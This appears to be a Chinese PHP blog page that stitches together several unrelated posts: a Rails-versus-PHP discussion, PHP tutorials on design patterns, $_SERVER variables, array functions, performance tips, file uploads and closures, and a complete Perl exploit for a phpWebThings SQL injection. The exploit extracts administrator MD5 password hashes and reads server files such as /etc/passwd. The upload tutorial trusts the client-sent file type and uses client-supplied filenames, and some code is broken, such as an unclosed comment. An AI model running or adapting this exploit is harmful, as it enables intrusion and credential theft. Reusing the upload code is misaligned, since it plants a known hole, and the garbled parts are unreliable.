阳光男孩

做ROR有一年了, 感觉非常好.配合敏捷实践(除了pair, 由于是和美国工程师远程合作.)开发速度的确快.一共三个人写代码，短短半年, 项目就基本结束了….

现在新项目即将到来, 客户在php和rails之间难以取舍. 我也打算趁此机会了解一下php.
由于项目定制性还是比较高，想通过成熟的CMS等系统来改改估计是没戏。
从头开发又觉得太慢。于是想从开源框架入手。

经过了解才发现, php新兴的一些框架基本上清一色的学习(或者叫抄袭,特别是cakePHP, 那简直抄得太厉害了.)rails。而且这些框架还发展的很好，越来越受到php社区的欢迎。 比如国外cakePHP,国内的Fleaphp, QeePHP等等，就不一一列举了.

昨天用cakePHP做了个简单的demo， 确实抄rails那是抄的相当直白。 甚至连rake都还有相应的东西代替。除了migration和filter我没找到对应的东西。让我一个不懂php的人,都还是可以很快地上手了.

一方面感叹php抄rails这种彻底，另一方面也感叹这些抄袭之作的确也带来了php开发效率的提升。虽然由于php本身的原因，框架的引入对性能的影响是比较大的。但是这些框架的出现大有重整php社区的意思。（至少客户就告诉我们，用rails不如用cakePHP，这样他们也不会引入更多风险。他们还介绍他们美国几个团队都又从rails转回cakePHP了.）

我就纳闷儿了，当时还觉得rails就是冲着php的市场去的。。。现在反而觉得rails的思想拯救了php…

大家觉得是应该继续说服客户呢？ 还是就用山寨rails了呢？

高手robbin的回复:
—————————————————————-

PHP和Python/Ruby的运行机制有一个本质区别：PHP是每次HTTP请求过来以后，初始化全部资源（例如创建数据库链接、加载系统类库，创建缓存等等），处理完毕，释放全部资源，这不像Python/Ruby之类带有GC的脚本语言，Python/Ruby是初次启动的时候初始化资源，随后的请求就不必再次初始化资源了。

这种机制的差异带来的区别就是：

1、PHP极难出现严重的内存泄露问题，随便你代码写的多烂，反正每个请求一执行完毕，所有资源统统释放光。而Python/Ruby则需要依赖GC来回收内存，因此稍有不慎，还是会出现GC无法释放的内存泄露问题。

2、PHP每次请求都要初始化资源，这个开销非常大。所以尽管PHP解析器本身的运行速度是极快的，但是一旦使用复杂的PHP框架，那么由于需要每次请求的时候初始化整个框架，性能的下降非常厉害，你用一个很复杂的PHP框架的结果就是整体性能被Ruby远远甩开。这也是为什么PHP社区这么多年来，并不怎么倾向于使用框架的原因之一。

3、由于PHP这种每请求初始化资源的机制，也造成了PHP添加跨请求的高级特性相当困难，这是PHP本身一个很大的限制，但是反过来说，正是这种限制使得PHP始终保持在一个比较简单的web语言上面，而正是这一点才是PHP得以成为互联网第一Web编程语言的原因，因此也未必就不好。

总之，PHP和Ruby的差异还是很大的，不适合放在一起比较，其实应该比较的是Ruby和Python才对。

所以我觉得Rails这种框架性做法被PHP跟风以后，其实是把PHP带上了邪路，所以不如说是Rails在误导PHP的发展。顺便多说一句：DHH在编写basecamp之前，一直是用PHP的，并且自己还写了一个PHP的快速开发框架，他改用ruby以后，把当初自己写的PHP框架也移植过来了，这个框架实际上是Rails最初的原型。那么为什么DHH当初不直接基于PHP做Rails呢?非要改用ruby以后，才发表rails呢？你看看PHP这种运行机制就知道了，PHP做复杂的web开发框架并不是一条光明的道路。

 phpWebThings <= 1.5.2 MD5 Hash恢复/文件公开远程漏洞
注：
1，无论php.ini如何设置此漏洞都有效；
2，wt_config.php 包含mysql登录
简要说明：
phpWebThings包括一个可以让攻击者执行SQL注入攻击的缺陷。此问题由于fdown.php脚本未能恰当的处理用户提供输入的”id”变量引起。而这将可能允许攻击者注入或者执行后台数据库SQL请求。

#!/usr/bin/perl
                                                                                    
###################################################################################################
# phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Remote Exploit                        #
#                                                                                                 #
# by staker                                                                                       #
# ——————————                                                                  #
# mail: staker[at]hotmail[dot]it                                                                  #
# url: http://phpwebthings.nl                                                                     #
# ——————————                                                                  #
#                                                                                                 #                        
# NOTE:                                                                                           #
# 1. it works regardless of php.ini settings                                                      #
# 2. wt_config.php contains mysql login                                                           #
#                                                                                                 #
# short explanation:                                                                              #
# —————————————————-                                            #
# phpWebThings contains a flaw that allows an attacker                                            #
# to carry out an SQL injection attack. The issue is                                              #
# due to the fdown.php script not properly sanitizing                                             #
# user-supplied input to the ‘id’ variable. This may                                              #
# allow an attacker to inject or manipulate                                                       #
# SQL queries in the backend database (php.ini indep)                                             #
# —————————————————-                                            #
#                                                                                                 #
# [file: fdown.php]                                                                               #
# ————————————                                                            #
#                                                                                                 #
# <?php                                                                                           #
# include_once(“core/main.php”);                                                                  #
#                                                                                                 #
# $ret = db_query(“select file from {$config["prefix"]}_forum_msgs where cod={$_REQUEST["id"]}”); #
# $row = db_fetch_array($ret);                                                                    #
# header(‘HTTP/1.1 200 OK’);                                                                      #
# header(‘Date: ‘ . date(“D M j G:i:s T Y”));                                                     #
# header(‘Last-Modified: ‘ . date(“D M j G:i:s T Y”));                                            #
# header(“Content-Type: application/force-download”);                                             #
# header(“Content-Lenght: ” . (string)(filesize(“var/forumfiles/{$row["file"]}”)));               #
# header(“Content-Transfer-Encoding: Binary”);                                                    #
# header(“Content-Disposition: attachment; filename={$row["file"]}”);                             #
# readfile(“var/forumfiles/{$row["file"]}”);                                                      #
#                                                                                                 #
# ?>                                                                                              #
#                                                                                                 #
# ————————————-                                                           #
#                                                                                                 #
# yeat@snippet:~/Desktop$ perl a.pl localhost/cms -c 1                                            #
# [*--------------------------------------------------------------------*]                        #
# [* phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Exploit  *]                        #
# [*--------------------------------------------------------------------*]                        #
# [* Usage: perl web.pl [target + path] [OPTIONS]                       *]                        #
# [*                                                                    *]                        #
# [* Options:                                                           *]                        #
# [* [files] -d ../../../../../../etc/passwd                            *]                        #
# [* [hash.] -c user_id                                                 *]                        #
# [* [table] -t set a table prefix (default: wt)                        *]                        #
# [*--------------------------------------------------------------------*]                        #
# [* MD5 Hash: f2c79ad3d1f03ba266dc0a85e1266671                                                   #
#                                                                                                 #
# ----------------------------------------------------------                                      #
# Today is: 12 June 2009                                                                          #
# Location: Italy,Turin.                                                                          #  
# http://www.youtube.com/watch?v=E78BGajeuAI&feature=related                                      #
# ----------------------------------------------------------                                      #
###################################################################################################

use LWP::UserAgent;
use Getopt::Long;

&phpWebThings::init;

my ($files,$admin,$ua_lib,$domain,$table);

$domain  = $ARGV[0] || exit(0);

$ua_lib = LWP::UserAgent->new(
                               timeout      => 5,
                               max_redirect => 0,
                               agent        => ‘Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)’,
                             ) || die $!;  

GetOptions(
           ‘p=s’ => \$proxy,
           ‘d=s’ => \$files,
           ‘c=i’ => \$admin,
           ‘t=s’ => \$table,
         );
        

die(&phpWebThings::Exploit);
  

sub phpWebThings::Exploit()
{
       return Disclose::File($files) if defined $files;
       return Retrieve::Hash($admin) if defined $admin;
}      
              
      
sub Disclose::File
{
      my $filename = $_[0] || die $!;
      
      my $keywords = “\x2F\x66\x64\x6F\x77\x6E\x2E\x70\x68\x70″;
      
      my $response = $ua_lib->post(parse::URL($domain.$keywords),
                     [ id => "1/**/union/**/select/**/0x".Hex::convert($filename)."#" ]);
      
      if ($response->status_line =~ /^(302|200|301)/) {
            return $response->content;
      }
      else {
            return $response->as_string;
      }            
}
      
sub Retrieve::Hash()
{
       my $user_id = $_[0] || die $!;
        
       my $keywords = “\x2F\x66\x64\x6F\x77\x6E\x2E\x70\x68\x70″;
      
       my $prefix = (defined $table) ? $table : ‘wt’;
            
       my $response = $ua_lib->post(parse::URL($domain.$keywords),
                     [ id => "1 UNION Select password FROM ${prefix}_users Where uid=$user_id#" ]);    
      
      if ($response->status_line =~ /^(302|200|301)/)
      {
            if ($response->content =~ /([0-9a-f]{32})/) {
                  return “[* MD5 Hash: $1\n";
            }        
      }
      else {
            return $response->as_string;
      }                          
}
          

sub Hex::convert()
{
       my $string = shift @_ || die $!;
      
       return unpack("H*",$string);
}      
        
      
sub parse::URL()
{
        my $string = shift @_ || die($!);
        
        if ($string !~ /^http:\/\/?/i) {
                $string = 'http://'.$string;
        }
        
        return $string;

}

sub phpWebThings::init
{
       print  "[*--------------------------------------------------------------------*]\n”.
              ”[* phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Exploit  *]\n”.
              ”[*--------------------------------------------------------------------*]\n”.
              ”[* Usage: perl web.pl [target + path] [OPTIONS]                       *]\n”.
              ”[*                                                                    *]\n”.
              ”[* Options:                                                           *]\n”.
              ”[* [files] -d ../../../../../../etc/passwd                            *]\n”.
              ”[* [hash.] -c user_id                                                 *]\n”.
              ”[* [table] -t set a table prefix (default: wt)                        *]\n”.
              ”[*--------------------------------------------------------------------*]\n”;
}  

观察者模式

[php]
/**
* 定义观察接口
*/
interface Subject
{
    public function Attach($Observer); //添加观察者
    public function Detach($Observer); //踢出观察者
    public function Notify(); //满足条件时通知观察者
    public function SubjectState($Subject); //观察条件
}

/**
* 观察类的具体实现
*/
class Boss Implements Subject
{
    public $_action;
   
    private $_Observer;
   
    public function Attach($Observer)
    {
        $this->_Observer[] = $Observer;
    }
   
    public function Detach($Observer)
    {
        $ObserverKey = array_search($Observer, $this->_Observer);
        
        if($ObserverKey !== false)
        {
            unset($this->_Observer[$ObserverKey]);
        }
    }
   
    public function Notify()
    {
        foreach($this->_Observer as $value )
        {
            $value->Update();
        }
    }
   
    public function SubjectState($Subject)
    {
        $this->_action = $Subject;
    }
}

/**
* 抽象观察者
*
*/
abstract class Observer
{
    protected $_UserName;
   
    protected $_Sub;
   
    public function __construct($Name,$Sub)
    {
        $this->_UserName = $Name;
        $this->_Sub = $Sub;
    }
   
    public abstract function Update(); //接收通过方法
}

/**
* 观察者
*/
class StockObserver extends Observer
{
    public function __construct($name,$sub)
    {
        parent::__construct($name,$sub);
    }
   
    public function Update()
    {
        echo $this->_Sub->_action.$this->_UserName.” 你赶快跑…”;
    }
}

$huhansan = new Boss(); //被观察者

$gongshil = new StockObserver(“三毛”,$huhansan); //初始化观察者

$huhansan->Attach($gongshil); //添加一个观察者
$huhansan->Attach($gongshil); //添加一个相同的观察者
$huhansan->Detach($gongshil); //踢出基中一个观察者

$huhansan->SubjectState(“警察来了”); //达到满足的条件

$huhansan->Notify(); //通过所有有效的观察者
[/php]

服务器变量 $_SERVER 详解：

1、$_SESSION['PHP_SELF'] — 获取当前正在执行脚本的文件名

2、$_SERVER['SERVER_PROTOCOL'] — 请求页面时通信协议的名称和版本。例如，“HTTP/1.0”。

3、$_SERVER['REQUEST_TIME'] — 请求开始时的时间戳。从 PHP 5.1.0 起有效。和time函数效果一样。

4、$_SERVER['argv'] — 传递给该脚本的参数。我试了下，get方法可以得到$_SERVER['argv'][0]；post方法无法给他赋值。

5、$_SERVER['SERVER_NAME'] — 返回当前主机名。

6、$_SERVER['SERVER_SOFTWARE'] — 服务器标识的字串，在响应请求时的头信息中给出。 如Microsoft-IIS/6.0

7、$_SERVER['REQUEST_METHOD'] — 访问页面时的请求方法。例如：“GET”、“HEAD”，“POST”，“PUT”。

8、$_SERVER['QUERY_STRING'] — 查询（query）的字符串（URL 中第一个问号 ? 之后的内容）。

9、$_SERVER['DOCUMENT_ROOT'] — 当前运行脚本所在的文档根目录。在服务器配置文件中定义。 如E:\server

10、$_SERVER['HTTP_ACCEPT'] — 当前请求的 Accept: 头信息的内容。

11、$_SERVER['HTTP_ACCEPT_CHARSET'] — 当前请求的 Accept-Charset: 头信息的内容。例如：“iso-8859-1,*,utf-8”。

12、$_SERVER['HTTP_ACCEPT_ENCODING'] — 当前请求的 Accept-Encoding: 头信息的内容。例如：“gzip”。

13、$_SERVER['HTTP_ACCEPT_LANGUAGE'] — 当前请求的 Accept-Language: 头信息的内容。例如：“en”。

14、$_SERVER['HTTP_CONNECTION'] — 当前请求的 Connection: 头信息的内容。例如：“Keep-Alive”。

15、$_SERVER['HTTP_HOST'] — 当前请求的 Host: 头信息的内容。

16、$_SERVER['HTTP_REFERER'] — 链接到当前页面的前一页面的 URL 地址。

17、$_SERVER['HTTP_USER_AGENT'] — 返回用户使用的浏览器信息。也可以使用 get_browser() 得到此信息。

18、$_SERVER['HTTPS'] — 如果通过https访问，则被设为一个非空的值，否则返回off.

19、$_SERVER['REMOTE_ADDR'] — 正在浏览当前页面用户的 IP 地址。

20、$_SERVER['REMOTE_HOST'] — 正在浏览当前页面用户的主机名。反向域名解析基于该用户的 REMOTE_ADDR。如本地测试返回127.0.0.1

21、$_SERVER['REMOTE_PORT'] — 用户连接到服务器时所使用的端口。我在本机测试没通过，不知道什么原因。

22、$_SERVER['SCRIPT_FILENAME'] — 当前执行脚本的绝对路径名。如返回E:\server\index.php

23、$_SERVER['SERVER_ADMIN'] — 该值指明了 Apache 服务器配置文件中的 SERVER_ADMIN 参数。如果脚本运行在一个虚拟主机上，则该值是那个虚拟主机的值

24、$_SERVER['SERVER_PORT'] — 服务器所使用的端口。默认为“80”。如果使用 SSL 安全连接，则这个值为用户设置的 HTTP 端口。

25、$_SERVER['SERVER_SIGNATURE'] — 包含服务器版本和虚拟主机名的字符串。

26、$_SERVER['PATH_TRANSLATED'] — 当前脚本所在文件系统（不是文档根目录）的基本路径。这是在服务器进行虚拟到真实路径的映像后的结果。 Apache 2 用 户可以使用 httpd.conf 中的 AcceptPathInfo On 来定义 PATH_INFO。

27、$_SERVER['SCRIPT_NAME'] — 包含当前脚本的路径。这在页面需要指向自己时非常有用。__FILE__ 包含当前文件的绝对路径和文件名（例如包含文件）。

28、$_SERVER['REQUEST_URI'] — 访问此页面所需的 URI。例如，“/index.html”。

29、$_SERVER['PHP_AUTH_DIGEST'] — 当作为 Apache 模块运行时，进行 HTTP Digest 认证的过程中，此变量被设置成客户端发送的“Authorization”HTTP 头内容（以便作进一步的认证操作）。

30、$_SERVER['PHP_AUTH_USER']– 当 PHP 运行在 Apache 或 IIS（PHP 5 是 ISAPI）模块方式下，并且正在使用 HTTP 认证功能，这个变量便是用户输入的用户名。

31、$_SERVER['PHP_AUTH_PW'] — 当 PHP 运行在 Apache 或 IIS（PHP 5 是 ISAPI）模块方式下，并且正在使用 HTTP 认证功能，这个变量便是用户输入的密码。

32、$_SERVER['AUTH_TYPE']–当 PHP 运行在 Apache 模块方式下，并且正在使用 HTTP 认证功能，这个变量便是认证的类型。

数组运用的熟练有时候能解决很多问题。熟悉相关函数就能事半功倍。
看看下面有关数组的函数你是否都熟悉呢？
一、数组操作的基本函数
数组的键名和值
array_values($arr);获得数组的值
array_keys($arr);获得数组的键名
array_flip($arr);数组中的值与键名互换（如果有重复前面的会被后面的覆盖）
in_array(“apple”,$arr);在数组中检索apple
array_search(“apple”,$arr);在数组中检索apple ，如果存在返回键名
array_key_exists(“apple”,$arr);检索给定的键名是否存在数组中
isset($arr[apple]):检索给定的键名是否存在数组中
数组的内部指针
current($arr);返回数组中的当前单元
pos($arr);返回数组中的当前单元
key($arr);返回数组中当前单元的键名
prev($arr);将数组中的内部指针倒回一位
next($arr);将数组中的内部指针向前移动一位
end($arr);将数组中的内部指针指向最后一个单元
reset($arr;将数组中的内部指针指向第一个单元
each($arr);将返回数组当前元素的一个键名/值的构造数组，并使数组指针向前移动一位
list($key,$value)=each($arr);获得数组当前元素的键名和值

数组和变量之间的转换
extract($arr);用于把数组中的元素转换成变量导入到当前文件中，键名当作变量名，值作为变量值
注：（第二个参数很重要，可以看手册使用）使用方法  echo $a;
compact(var1,var2,var3);用给定的变量名创建一个数组

二、数组的分段和填充
数组的分段
array_slice($arr,0,3);可以将数组中的一段取出，此函数忽略键名
array_splice($arr,0,3，array(“black”,”maroon”));可以将数组中的一段取出，与上个函数不同在于返回的序列从原数组中删除

分割多个数组
array_chunk($arr,3,TRUE);可以将一个数组分割成多个，TRUE为保留原数组的键名

数组的填充
array_pad($arr,5,’x');将一个数组填补到制定长度

三、数组与栈
array_push($arr,”apple”,”pear”);将一个或多个元素压入数组栈的末尾（入栈），返回入栈元素的个数
array_pop($arr);将数组栈的最后一个元素弹出（出栈）

四、数组与列队
array_shift($arr);数组中的第一个元素移出并作为结果返回（数组长度减1，其他元素向前移动一位，数字键名改为从零技术，文字键名不变）
array_unshift($arr,”a”,array(1,2));在数组的开头插入一个或多个元素

五、回调函数
array_walk($arr,’function’,'words’);使用用户函数对数组中的每个成员进行处理（第三个参数传递给回调函数function）
array_mpa(“function”,$arr1,$arr2);可以处理多个数组（当使用两个或更多数组时，他们的长度应该相同）
array_filter($arr,”function”);使用回调函数过滤数组中的每个元素，如果回调函数为TRUE，数组的当前元素会被包含在返回的结果数组中，数组的键名保留不变
array_reduce($arr,”function”,”*”);转化为单值函数（*为数组的第一个值）

六、数组的排序
通过元素值对数组排序
sort($arr);由小到大的顺序排序（第二个参数为按什么方式排序）忽略键名的数组排序
rsort($arr);由大到小的顺序排序（第二个参数为按什么方式排序）忽略键名的数组排序
usort($arr,”function”);使用用户自定义的比较函数对数组中的值进行排序（function中有两个参数，0表示相等，正数表示第一个大于第二个，负数表示第一个小于第二个）忽略键名的数组排序
asort($arr);由小到大的顺序排序（第二个参数为按什么方式排序）保留键名的数组排序
arsort($arr);由大到小的顺序排序（第二个参数为按什么方式排序）保留键名的数组排序
uasort($arr,”function”);使用用户自定义的比较函数对数组中的值进行排序（function中有两个参数，0表示相等，正数表示第一个大于第二个，负数表示第一个小于第二个）保留键名的数组排序

通过键名对数组排序
ksort($arr);按照键名正序排序
krsort($arr);按照键名逆序排序
uksort($arr,”function”);使用用户自定义的比较函数对数组中的键名进行排序（function中有两个参数，0表示相等，正数表示第一个大于第二个，负数表示第一个小于第二个）

自然排序法排序
natsort($arr);自然排序（忽略键名）
natcasesort($arr);自然排序（忽略大小写，忽略键名）

七、数组的计算
数组元素的求和
array_sum($arr);对数组内部的所有元素做求和运算

数组的合并
array_merge($arr1,$arr2);合并两个或多个数组（相同的字符串键名，后面的覆盖前面的，相同的数字键名，后面的不会做覆盖操作，而是附加到后面）
“+”$arr1+$arr2;对于相同的键名只保留后一个
array_merge_recursive($arr1,$arr2);递归合并操作，如果数组中有相同的字符串键名，这些值将被合并到一个数组中去。如果一个值本身是一个数组，将按照相应的键名把它合并为另一个数组。当数组具有相同的数组键名时，后一个值将不会覆盖原来的值，而是附加到后面

数组的差集
array_diff($arr1,$arr2);返回差集结果数组
array_diff_assoc($arr1,$arr2,$arr3);返回差集结果数组，键名也做比较

数组的交集
array_intersect($arr1,$arr2);返回交集结果数组
array_intersect_assoc($arr1,$arr2);返回交集结果数组，键名也做比较

八、其他的数组函数
range(0,12);创建一个包含指定范围单元的数组
array_unique($arr);移除数组中重复的值，新的数组中会保留原始的键名
array_reverse($arr,TRUE);返回一个单元顺序与原数组相反的数组，如果第二个参数为TRUE保留原来的键名
//srand((float)microtime()*10000000); 随机种子触发器
array_rand($arr,2);从数组中随机取出一个或 多个元素
shuffle($arr);将数组的顺序打乱

1.如果一个方法可静态化，就对它做静态声明。速率可提升至4倍。

2.echo 比 print 快。

3.使用echo的多重参数（译注：指用逗号而不是句点）代替字符串连接。

4.在执行for循环之前确定最大循环数，不要每循环一次都计算最大值。

5.注销那些不用的变量尤其是大数组，以便释放内存。

6.尽量避免使用__get，__set，__autoload。

7.require_once()代价昂贵。

8.在包含文件时使用完整路径，解析操作系统路径所需的时间会更少。

9.如果你想知道脚本开始执行（译注：即服务器端收到客户端请求）的时刻，使用$_SERVER[‘REQUEST_TIME’]要好于time()。

10.函数代替正则表达式完成相同功能。

11.str_replace函数比preg_replace函数快，但strtr函数的效率是str_replace函数的四倍。

12.如果一个字符串替换函数，可接受数组或字符作为参数，并且参数长度不太长，那么可以考虑额外写一段替换代码，使得每次传递参数是一个字符，而不是只写一行代码接受数组作为查询和替换的参数。

13.使用选择分支语句（译注：即switch case）好于使用多个if，else if语句。

14.用@屏蔽错误消息的做法非常低效。

15.打开apache的mod_deflate模块。

16.数据库连接当使用完毕时应关掉。

17.$row[‘id’]的效率是$row[id]的7倍。

18.错误消息代价昂贵。

19.尽量不要在for循环中使用函数，比如for ($x=0; $x < count($array); $x)每循环一次都会调用count()函数。

20.在方法中递增局部变量，速度是最快的。几乎与在函数中调用局部变量的速度相当。

21.递增一个全局变量要比递增一个局部变量慢2倍。

22.递增一个对象属性（如：$this->prop++）要比递增一个局部变量慢3倍。

23.递增一个未预定义的局部变量要比递增一个预定义的局部变量慢9至10倍。

24.仅定义一个局部变量而没在函数中调用它，同样会减慢速度（其程度相当于递增一个局部变量）。PHP大概会检查看是否存在全局变量。

25.方法调用看来与类中定义的方法的数量无关，因为我（在测试方法之前和之后都）添加了10个方法，但性能上没有变化。

26.派生类中的方法运行起来要快于在基类中定义的同样的方法。

27.调用带有一个参数的空函数，其花费的时间相当于执行7至8次的局部变量递增操作。类似的方法调用所花费的时间接近于15次的局部变量递增操作。

28.用单引号代替双引号来包含字符串，这样做会更快一些。因为PHP会在双引号包围的字符串中搜寻变量，单引号则不会。当然，只有当你不需要在字符串中包含变量时才可以这么做。

29.输出多个字符串时，用逗号代替句点来分隔字符串，速度更快。注意：只有echo能这么做，它是一种可以把多个字符串当作参数的“函数”（译注：PHP手册中说echo是语言结构，不是真正的函数，故把函数加上了双引号）。

30.Apache解析一个PHP脚本的时间要比解析一个静态HTML页面慢2至10倍。尽量多用静态HTML页面，少用脚本。

31.除非脚本可以缓存，否则每次调用时都会重新编译一次。引入一套PHP缓存机制通常可以提升25%至100%的性能，以免除编译开销。

32.尽量做缓存，可使用memcached。memcached是一款高性能的内存对象缓存系统，可用来加速动态Web应用程序，减轻数据库负载。对运算码 (OP code)的缓存很有用，使得脚本不必为每个请求做重新编译。

33.当操作字符串并需要检验其长度是否满足某种要求时，你想当然地会使用strlen()函数。此函数执行起来相当快，因为它不做任何计算，只返回在 zval 结构（C的内置数据结构，用于存储PHP变量）中存储的已知字符串长度。但是，由于strlen()是函数，多多少少会有些慢，因为函数调用会经过诸多步 骤，如字母小写化（译注：指函数名小写化，PHP不区分函数名大小写）、哈希查找，会跟随被调用的函数一起执行。在某些情况下，你可以使用isset() 技巧加速执行你的代码。

（举例如下）
if (strlen($foo) < 5) { echo “Foo is too short”; }
（与下面的技巧做比较）
if (!isset($foo{5})) { echo “Foo is too short”; }

调用isset()恰巧比strlen()快，因为与后者不同的是，isset()作为一种语言结构，意味着它的执行不需要函数查找和字母小写化。也就是说，实际上在检验字符串长度的顶层代码中你没有花太多开销。

34.当执行变量$i的递增或递减时，$i++会比++$i慢一些。这种差异是PHP特有的，并不适用于其他语言，所以请不要修改你的C或Java代码并 指望它们能立即变快，没用的。++$i更快是因为它只需要3条指令(opcodes)，$i++则需要4条指令。后置递增实际上会产生一个临时变量，这个 临时变量随后被递增。而前置递增直接在原值上递增。这是最优化处理的一种，正如Zend的PHP优化器所作的那样。牢记这个优化处理不失为一个好主意，因 为并不是所有的指令优化器都会做同样的优化处理，并且存在大量没有装配指令优化器的互联网服务提供商（ISPs）和服务器。

35.并不是事必面向对象(OOP)，面向对象往往开销很大，每个方法和对象调用都会消耗很多内存。

36.并非要用类实现所有的数据结构，数组也很有用。

37.不要把方法细分得过多，仔细想想你真正打算重用的是哪些代码？

38.当你需要时，你总能把代码分解成方法。

39.尽量采用大量的PHP内置函数。

40.如果在代码中存在大量耗时的函数，你可以考虑用C扩展的方式实现它们。

41.评估检验(profile)你的代码。检验器会告诉你，代码的哪些部分消耗了多少时间。Xdebug调试器包含了检验程序，评估检验总体上可以显示出代码的瓶颈。

42.mod_zip可作为Apache模块，用来即时压缩你的数据，并可让数据传输量降低80%。

通过 PHP，可以把文件上传到服务器。

创建一个文件上传表单
允许用户从表单上传文件是非常有用的。

请看下面这个供上传文件的 HTML 表单：
<html>
<body>

<form action=”upload_file.php” method=”post”
enctype=”multipart/form-data”>
<label for=”file”>Filename:</label>
<input type=”file” name=”file” id=”file” />
<br />
<input type=”submit” name=”submit” value=”Submit” />
</form>

</body>
</html>
请留意如下有关此表单的信息：

<form> 标签的 enctype 属性规定了在提交表单时要使用哪种内容类型。在表单需要二进制数据时，比如文件内容，请使用 “multipart/form-data”。

<input> 标签的 type=”file” 属性规定了应该把输入作为文件来处理。举例来说，当在浏览器中预览时，会看到输入框旁边有一个浏览按钮。

注释：允许用户上传文件是一个巨大的安全风险。请仅仅允许可信的用户执行文件上传操作。

创建上传脚本
“upload_file.php” 文件含有供上传文件的代码：
<?php
if ($_FILES["file"]["error"] > 0)
{
echo “Error: ” . $_FILES["file"]["error"] . “<br />”;
}
else
{
echo “Upload: ” . $_FILES["file"]["name"] . “<br />”;
echo “Type: ” . $_FILES["file"]["type"] . “<br />”;
echo “Size: ” . ($_FILES["file"]["size"] / 1024) . ” Kb<br />”;
echo “Stored in: ” . $_FILES["file"]["tmp_name"];
}
?>
通过使用 PHP 的全局数组 $_FILES，你可以从客户计算机向远程服务器上传文件。

第一个参数是表单的 input name，第二个下标可以是 “name”, “type”, “size”, “tmp_name” 或 “error”。就像这样：

$_FILES["file"]["name"] – 被上传文件的名称
$_FILES["file"]["type"] – 被上传文件的类型
$_FILES["file"]["size"] – 被上传文件的大小，以字节计
$_FILES["file"]["tmp_name"] – 存储在服务器的文件的临时副本的名称
$_FILES["file"]["error"] – 由文件上传导致的错误代码

这是一种非常简单文件上传方式。基于安全方面的考虑，您应当增加有关什么用户有权上传文件的限制。

上传限制
在这个脚本中，我们增加了对文件上传的限制。用户只能上传 .gif 或 .jpeg 文件，文件大小必须小于 20 kb：
<?php

if ((($_FILES["file"]["type"] == “image/gif”)
|| ($_FILES["file"]["type"] == “image/jpeg”)
|| ($_FILES["file"]["type"] == “image/pjpeg”))
&& ($_FILES["file"]["size"] < 20000))
{
if ($_FILES["file"]["error"] > 0)
{
echo “Error: ” . $_FILES["file"]["error"] . “<br />”;
}
else
{
echo “Upload: ” . $_FILES["file"]["name"] . “<br />”;
echo “Type: ” . $_FILES["file"]["type"] . “<br />”;
echo “Size: ” . ($_FILES["file"]["size"] / 1024) . ” Kb<br />”;
echo “Stored in: ” . $_FILES["file"]["tmp_name"];
}
}
else
{
echo “Invalid file”;
}

?>
注释：对于 IE，识别 jpg 文件的类型必须是 pjpeg，对于 FireFox，必须是 jpeg。

保存被上传的文件
上面的例子在服务器的 PHP 临时文件夹创建了一个被上传文件的临时副本。

这个临时的复制文件会在脚本结束时消失。要保存被上传的文件，我们需要把它拷贝到另外的位置：
<?php
if ((($_FILES["file"]["type"] == “image/gif”)
|| ($_FILES["file"]["type"] == “image/jpeg”)
|| ($_FILES["file"]["type"] == “image/pjpeg”))
&& ($_FILES["file"]["size"] < 20000))
{
if ($_FILES["file"]["error"] > 0)
{
echo “Return Code: ” . $_FILES["file"]["error"] . “<br />”;
}
else
{
echo “Upload: ” . $_FILES["file"]["name"] . “<br />”;
echo “Type: ” . $_FILES["file"]["type"] . “<br />”;
echo “Size: ” . ($_FILES["file"]["size"] / 1024) . ” Kb<br />”;
echo “Temp file: ” . $_FILES["file"]["tmp_name"] . “<br />”;

if (file_exists(“upload/” . $_FILES["file"]["name"]))
{
echo $_FILES["file"]["name"] . ” already exists. “;
}
else
{
move_uploaded_file($_FILES["file"]["tmp_name"],
“upload/” . $_FILES["file"]["name"]);
echo “Stored in: ” . “upload/” . $_FILES["file"]["name"];
}
}
}
else
{
echo “Invalid file”;
}
?>
上面的脚本检测了是否已存在此文件，如果不存在，则把文件拷贝到指定的文件夹。

注释：这个例子把文件保存到了名为 “upload” 的新文件夹。

PHP中合理使用静态方法可以提高程序的执行效率,一段小例子:
<?php
/**
 *@name 测试你就知道了
 *@author 阳光男孩 WWW.SHININGBOYS.CN
class bench {
    public function a() { return 1; }
    public static function b() { return 1; }
}
$s = microtime(1);
for ($i = 0; $i < 100000; $i++) bench::a();
$e = microtime(1);
echo ”Dynamic Static Method: ”.($e - $s).”\n”;

$s = microtime(1);
for ($i = 0; $i < 100000; $i++) bench::b();
$e = microtime(1);

echo ”Declared Static Method: ”.($e - $s).”\n”;
php?>

PHP5.3 新版本跟随了很多新特性，其中比较惹眼的特性之一就是支持了闭包。那么以后，我们也可以和那帮写 Ruby、Javascript 等等“高科技语言”的家伙们一样，写出非常酷的代码吗？呃，其实大部分情况下是可以的，而有些方面还是令人非常的困扰，下面慢慢道来。

很多语言的都提供了非常优雅和漂亮的操作数组的方法。在下面的例子中，会使用 PHP5.3 以及其他语言提供的闭包功能，用于展示如何“客观的”操作迭代数组。

译注：原文作者比较火星，我不了解 Groovy 以及 Scala 语言，所以这里我加上 Javascript 的实现。

在开始之前先说明下，本例子仅仅是阐明观点，并没有考虑性能等其他方面的因素。
“货比三家”
用个简单的例子开始，有下面个数组：
$nums = array(10, 20, 30, 40);
需要找出数组中大于 15 的项。那么，不考虑闭包的情况下，我们或许会这样写：
$res = array();
foreach ($nums as $n) {
if ($n > 15) {
$res[] = $n;
}
}
如果语言本身有闭包支持的，那么或许会这样写（Groovy 语言）
def res = nums.findAll { it > 15 }
或者使用 Scala 语言
val res = nums filter (_ > 15)
译注：Javascript 1.6 的话会是如下
var res = nums.filter(function(c){return c > 15});
因为循环操作已被抽象起来，所以可以看到 Groovy 、Scala （以及 Javascript） 都很漂亮得用一行就可以搞定。

当然，如果使用 PHP5.3 的闭包，也可以做到
$res = array_filter($nums, function($v) { return $v > 15; });
PHP 在这方面使用了比 Scala 更多的字符，但对比先前的例子，它更简短并且能更好得阅读。

顺便说下，上面的 PHP 代码实际上是使用了 Lambda 解析式，并不是个真正的闭包，这个 并不是我们目前关注的重点。详细阐述 PHP 闭包以及 Lambda 解析式的资料，可以参考这里。

目前看来感觉都还不错，那么我们再的题目增加点难度：找到所有大于 15 的项， 然后乘以 2 再加上作用域中的的某个变量值以后再返回。

Groovy 的实现：
def x = 1
def res = nums .findAll { it > 15 } .collect { it * 2 + x }
Scala 的实现：
val x = 1
